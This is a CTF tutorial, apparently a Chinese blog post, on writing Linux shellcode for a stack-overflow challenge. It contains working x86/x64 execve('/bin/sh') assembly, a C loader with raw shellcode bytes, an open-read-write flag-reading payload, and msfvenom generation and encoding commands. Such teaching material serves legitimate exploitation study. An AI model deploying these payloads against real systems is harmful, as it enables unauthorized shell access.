shellcode学习

一道题目

最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ，这道题目需要我们自己编写 shellcode ，以前 shellcode 都是从 pwntools 或者是msf里面直接生成的，所以借此机会来学习一下 shellcode 的编写

我们先检查一下附件的保护机制 ，啥保护也没开，所以我们可以直接在栈上面构造shellcode然后执行

丢到IDA里面看一下，这里变量s的栈空间只有.0x20大小，而fgets函数可以读入50即0x32，所以存在栈溢出

我们看一下 pwntools 直接生成的 shellcode ，可以看到有足足0x2c大小，栈是装不下的，所以需要我们手写 shellcode

常见获取shellcode的方法

pwntools

在 pwntools 里面使用 shellcraft 函数生成 shellcode ，使用该函数的时候需要在前面指定架构，因为每个架构生成的 shellcode 是不一样的

context(os = 'linux', arch = 'i386')	# os是指操作系统，arch指架构
shellcode = shellcraft.sh()

直接使用 shellcraft.sh() 可以直接生成汇编语言格式的 shellcode

这里拿 i386 架构的 shellcode 浅析一下

form pwn import *
context(os = 'linux', arch = 'i386')
shellcode = shellcraft.sh()
print(shellcode)

这就是pwntools生成的shellcode

msf

msf是一个漏洞利用框架，可以使用msfvenom生成shellcode

直接 msfvenom --help 就可以查看相关命令

使用 --list 可以列出一些payload的信息

msfvenom就是一个生成shellcode的工具，这里不做过多的介绍，关于该工具的更多使用，大家可以上网查阅

exploit-db

这是一个漏洞库，里面会有很多漏洞利用的shellcode

官网 : https://www.exploit-db.com/

该网站有很多最新或者以前的漏洞，里面一般都有exp，也可以从这些exp中学习shellcode

shell-storm

这个网站里面有很多大佬写的shellcode

网站 : http://shell-storm.org/shellcode/

shellcode编写

前置知识

首先我们学习一下系统调用，程序在执行到int 0x80的时候会进入内核态执行相应的系统调用，这时候eax/rax存放的是系统调用号，然后寄存器里面存放着各个参数

x86

x86程序的参数分别由ebx/ecx/edxesi/edi/ebp存放

x64

x64程序的参数分别由rdi/rsi/rdx/r10/r8/r9存放

简单的shellcode

这里我们使用汇编来编写练习一下shellcode的编写

x86

;nasm -f elf32 shellcode_x86.asm
;ld -m elf_i386 -o shellcode_x64 shellcode_x86.o

global _start
_start:
        push 0x68732f	;push '/sh'
        push 0x6e69622f	;push '/bin'
        mov ebx, esp	;ebx='/bin/sh'
        xor edx, edx	;edx=0
        xor ecx, ecx	;ecx=0
        mov eax, 0xb	eax=0xb
        int 0x80

x64

;nasm -f elf64 shellcode_x64.asm
;ld -m elf_x86_64 -o shellcode_x64 shellcode_x64.o

global _start
_start:
        mov rbx, '/bin/sh'	;将'/bin/sh'赋值给rbx
        push rbx	;将rbx的值，即'/bin/sh'压入栈中
        push rsp	;将esp的值压入栈中
        pop rdi		;将esp赋值给rdi，rdi='/bin/sh'
        xor rsi, rsi	;rsi=0
        xor rdx, rdx	;rdx=0
        mov rax, 0x3b	;rax=0x3b
        syscall

其实归根到底就是调用 execve('/bin/sh', 0, 0)

我们测试一下，使用 objdump 将文件的汇编代码以及十六进制显示出来 objdump -d shellcode_x64.o

然后我们写一个加载器，加载这个shellcode，我们把shellcode设置为局部变量，这样就会加载在栈上，然后我们给栈可执行权限 -z execstack

// gcc exp.c -o exp -g -z execstack
#include <stdio.h>
#include <string.h>
int main(){
	char buf[] = "\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x54\x5f\x48\x31\xf6\x48\x31\xd2\xb8\x3b\x00\x00\x00\x0f\x05";	// shellcode
    	void (*fp)(void) = (void (*)(void))buf;
    	printf("Length : %ld\n", strlen(buf));
    	fp();
    	return 0;
}

我们运行，成功拿到一个shell

orw

在PWN比赛中有时会遇到开了沙盒的题目，这时候大部分系统调用都被禁用了，一般open、read、write这三个系统调用不会被禁用，所以我们可以使用orw直接将flag打印出来

;x86
global _start
_start:
	push 'flag'		;fd=open(flag, 0)
	mov eax, 0x5
	mov ebx, esp
	mov ecx, 0
	int 0x80
	mov ebx, eax	;read(fd, addr, 0x40)
	mov eax, 0x3
	mov ecx, addr
	mov edx, 0x40
	int 0x80
	mov ebx, 0x1	;write(1, addr, 0x40)
	mov eax, 0x4
	mov ecx, addr
	mov edx, 0x40
	int 0x80

shellcode变形

有时候程序会只让我们输入可打印字符，这是我们就需要将shellcode进行变形

对于x86的话，msf里面有个内置的encoder模块，可以生成编码过后的shellcode

也可以使用管道符来对自己的shellcode进行编码

cat shellcode | msfvenom -p linux -e x86/alpha_upper BufferRegister=eax

参考文章

https://blog.youkuaiyun.com/qq_35495684/article/details/79583232

https://docs.pwntools.com/